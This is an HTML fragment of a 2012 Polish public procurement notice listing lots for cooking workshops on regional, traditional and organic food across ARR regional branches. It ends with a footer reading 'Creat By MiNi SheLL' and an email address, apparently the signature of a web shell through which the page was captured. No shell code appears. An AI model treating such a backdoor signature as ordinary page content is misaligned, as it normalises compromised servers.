<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 5: Oddział Terenowy ARR Kraków.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Celem warsztatów jest nauka praktycznego przygotowania, w oparciu o tradycyjne receptury i metody wytwarzania, dań kuchni lokalnej i tradycyjnej na bazie produktów wysokiej jakości. 
Podczas warsztatów uczniowie pod okiem ekspertów, pracować będą w 8 grupach 3 osobowych. W trakcie zajęć omawiać będą poszczególne etapy procesu przygotowania potraw, dowiadując się o bogactwie tradycji kulinarnych regionu, specyficznym smaku produktów, tradycyjnych metodach upraw o także o poszanowaniu środowiska.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 6: Oddział Terenowy ARR Opole.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 7: Oddział Terenowy ARR Poznań.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych, oraz zasad zdrowego żywienia. Region Ostrzeszowa to zagłębie producentów Młodej Gęsi Owsianej - produktu regionalnego, z którego okoliczni mieszkańcy wytwarzają pasztety, oraz potrawy z mięsa gęsi Owsianej. W festiwalu uczestniczy ponad 20 tysięcy mieszkańców Polski oraz państw Europejskich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 8: Oddział Terenowy ARR Olsztyn.
Przedmiotem zamówienia jest przeprowadzenie pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Celem pokazów jest przekazanie wiedzy o walorach wołowiny wysokiej jakości oraz praktycznym wykorzystaniu wołowiny w gastronomii i gospodarstwie domowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 9: Oddział Terenowy ARR Wrocław.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych i pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych. Zadaniem warsztatów jest zwrócenie uwagi uczniów szkół o profilu rolniczym i gastronomicznym na metody produkcji produktów żywnościowych oraz wpływ tych metod na jakość tych produktów oraz wykorzystanie ich w przyrządzaniu potraw regionalnych i tradycyjnych. Uzupełnieniem warsztatów będzie przekazanie wiedzy o systemach jakości żywności. Realizacja powyższych zadań ma na celu promocję produktów żywnościowych regionalnych, tradycyjnych oraz produktów produkowanych w oparciu o systemy jakości żywności w tym wyprodukowane metodami ekologicznymi i upowszechnianie wiedzy o wpływie metod produkcji na jakość produktów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 10: Oddział Terenowy ARR Gdynia.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych oraz zasad zdrowego żywienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 11: Oddział Terenowy ARR Gorzów Wielkopolski.
Przedmiotem zamówienia jest przeprowadzenie jednodniowych warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Warsztaty będą organizowane podczas XX Lubuskich Prezentacji Wokalnych Dzieci i Młodzieży Specjalnej Troski, które są elementem Międzynarodowego Festiwalu Artystycznego pn. Dzieci Europy - Europakinder.
Warsztaty kulinarne organizowane po raz drugi przez OT ARR w Gorzowie Wlkp. mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów ekologicznych i kształtowanie dobrych nawyków żywieniowych wśród dzieci i młodzieży niepełnosprawnej, a tym samym wpływają na rehabilitację młodzieży specjalnej troski poprzez sztukę kulinarną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 12: Oddział Terenowy ARR Gorzów Wielkopolski.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Warsztaty będą organizowane w ramach cyklu edukacyjnego pod hasłem Okopowe w tradycji kuchni polskiej - Sprawni inaczej.
Warsztaty kulinarne zorganizowane przez OT ARR w Gorzowie Wlkp. mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów regionalnych, tradycyjnych i ekologicznych oraz kształtowanie dobrych nawyków żywieniowych wśród dzieci i młodzieży niepełnosprawnej, a tym samym wpływają na rehabilitację młodzieży specjalnej troski poprzez sztukę kulinarną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 13: Oddział Terenowy ARR Gorzów Wielkopolski.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad prawidłowego żywienia. Warsztaty będą organizowane w ramach cyklu edukacyjnego dla dzieci pod hasłem: Szlakiem owoców i warzyw. 
Zajęcia edukacyjno-kulinarne zorganizowane po raz pierwszy przez OT ARR w Gorzowie Wlkp. na terenie województwa lubuskiego mają na celu promocję produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów regionalnych i ekologicznych oraz kształtowania dobrych nawyków żywieniowych wśród najmłodszych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 14: Oddział Terenowy ARR Lublin.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych i tradycyjnych oraz zasad zdrowego żywienia. Warsztaty mają na celu zwrócenie uwagi młodzieży na walory odżywcze i smakowe produktów ekologicznych i możliwości ich wykorzystania. Ponadto powinny przypominać o dorobku kulinarnym regionu lubelskiego, jego tradycjach kulinarnych oraz informować o możliwości wykorzystania powyższej wiedzy w przyszłej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 15: Oddział Terenowy ARR Lublin.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych i tradycyjnych oraz zasad zdrowego żywienia. Warsztaty mają na celu zwrócenie uwagi na walory odżywcze i smakowe produktów ekologicznych i możliwości ich wykorzystania. Ponadto powinny przypominać o dorobku kulinarnym regionu lubelskiego, jego tradycjach kulinarnych oraz informować o sposobach propagowania powyższej wiedzy w pracy zawodowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Przeprowadzenie warsztatów szkoleniowych oraz pokazów kulinarnych dotyczących produktów regionalnych, tradycyjnych 
i ekologicznych oraz zasad zdrowego żywienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie częściowe nr 16: Oddział Terenowy ARR Kielce.
Przedmiotem zamówienia jest przeprowadzenie warsztatów kulinarnych dotyczących produktów regionalnych, tradycyjnych i ekologicznych oraz zasad zdrowego żywienia. Warsztaty będą organizowane w ramach cyklu edukacyjnego dla dzieci pod hasłem: 
I dziewczyny i chłopaki pragną poznać zdrowia smaki. Niniejsze zajęcia edukacyjno-kulinarne stanowią element III części kampanii zatytułowanej. Wiemy, co jemy i zdrowo żyjemy, prowadzonej przez OT Kielce na terenie województwa świętokrzyskiego w celu promocji produktów rolno-spożywczych, ze szczególnym uwzględnieniem produktów tradycyjnych, regionalnych i ekologicznych oraz kształtowania dobrych nawyków żywieniowych wśród najmłodszych (jako przeciwdziałanie wczesnej nadwagi i otyłości wśród dzieci).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com